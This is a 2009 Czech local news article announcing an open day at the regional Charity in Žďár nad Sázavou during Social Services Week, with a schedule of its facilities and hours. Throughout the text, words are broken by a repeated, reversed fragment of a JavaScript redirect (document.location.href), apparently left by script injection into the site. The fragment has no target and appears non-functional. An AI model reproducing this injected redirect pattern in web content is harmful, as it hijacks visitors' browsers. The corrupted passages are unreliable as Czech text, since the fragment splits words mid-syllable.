Žďár nad Sázavou, zdar nad sazavou, aktuality, charita
Rainbow page separator

Oblastní charita Žďár otevře v říjnu všechny své dveře návštěvníkům

Pátek, 2. října 2009

 Ministerstvo práce a sociálních věcí a Asociace posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelů sociálních služeb České republiky vyhlásily kampaň s názvem „Týden sociálních služeb“, která se bude konat  ve dnech od 5. do 11. října 2009 na různých místech České republiky. Hlavním smyslem té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akce je seznámit veřejnost se sociálními službami, které jsou regionech posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny.

Jednou ze stěžejních aktivit Týdne sociálních služeb je Den otevřených dveří, který byl celorepublikově vyhlášen na středu 7. října 2009. Oblastní charita Žďár nad Sázavou se rozhodla v ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to den také otevřít dveře od svých jedenácti zařízení.

„Naším úmyslem je umožnit zájemcům nahlédnout pod pokličku služeb, které v Charitě poskytujeme. Je stále možné, že v naší společnosti existují lidé, kteří se dostanou do bezvýchodných situací a netuší, na koho se obrátit, mnohdy ani netuší, že na nějakou pomoc a péči mají nárok. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se snažíme průběžně informovat veřejnost o našich službách, aby se tak ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to informace dostali k lidem, kteří potřebují pomoci nebo k těm, kteří ji mohou zprostředkovat.“ řekla Ing. Jana Zelená, ředitelka Oblastní charity Žďár.

Pracovníci Charity se právě z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to důvodu zapojili do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to celostátní akce, aby tak zvýšili informovanost o službách, které jejich zařízení poskytuje a nabídli je tak široké veřejnosti. Ne všechny služby, které žďárská Charita poskytuje jsou služby sociální. Do kampaně se společně s ostatními zařízeními přidala i Charitní ošetřovatelská služba, která provádí zdravotní úkony, Kopretina – centrum pro rodiče s dětmi, která pečuje o zdravý vývoj v rodině, a Kambala – dobrovolnické centrum, zabývající se prací s dobrovolníky.

ČASOVÝ HARMONOGRAM DNE OTEVŘENÝCH DVEŘÍ
VE STŘEDU 7.10. 2009 V OBLASTNÍ CHARITĚ ŽĎÁR NAD SÁZAVOU

 • Charitní ošetřovatelská služba  8.00-12.00 hod.
  Studentská 4, Žďár nad Sázavou
 • Domácí hospicová péče   9.00-15.00 hod.
  Horní 22, Žďár nad Sázavou
 • Charitní pečovatelská služba   8.00-15.00 hod.
 • Včela – centrum aktivizačních služeb pro seniory
  Hornická 643, Bystřice n. Pern.
 • Domov pokojného života Nížkov 10.00-15.00 hod.
  Nížkov 37
 • Klub v 9 – centrum služeb pro podporu duševního zdraví  9.00-13.00 hod.
  Okružní 1, Žďár n. Sáz.
 • Nesa – denní stacionář   9.00-15.30
  Náměstí Velké Meziříčí (z důvodu probíhající rekonstrukce)
 • Ponorka – nízkoprahové zařízení pro děti a mládež  10.00-14.00 hod.
  Nádražní 44, Žďár nad Sázavou
 • Nadosah – centrum prevence     14.00-16.00 hod.
  Masarykovo nám. 299, Bystřice nad Pernštejnem
 • Kopretina – centrum pro rodiče s dětmi    10.00-16.00 hod.
  Pobočka Bystřice nad Pernštejnem, Hornická 643
  Pobočka Velké Meziříčí, Ostrůvek 2
  Pobočka Žďár nad Sázavou, Horní 22
 • Kambala – dobrovolnické centrum     10.00-16.00 hod.
  Horní 22, Žďár nad Sázavou

 

Během Týdne sociálních služeb se bude moci široká veřejnost osobně přesvědčit o kvalitě té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oblasti a faktu, že sociální služby pomáhají statisícům obyvatel zachovávat lidskou důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojnost a soběstačnost. V rámci akce se uskuteční také 1. Výroční kongres posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelů sociálních služeb, kde zazní informace o aktuálním dění v sociálních službách a dojde k vzájemné výměně zkušeností. Na kongresu vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí zástupci státní správy, samosprávy a samotných posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelů.
V České republice v současné době působí 2 268 poskytovatelů sociálních služeb (neziskové organizace, města a obce, obchodní společnosti, příspěvkové organizace krajů a obcí aj.). Sociální služby zaměstnávají více než 50 000 lidí, potřebují je mimo jiné senioři, osoby se zdravotním postižením, lidé, kteří jsou ohroženi sociálním vyloučení aj.

Detailní informace o Týdnu sociálních služeb najdete na www.tyden-socialnich-sluzeb.cz.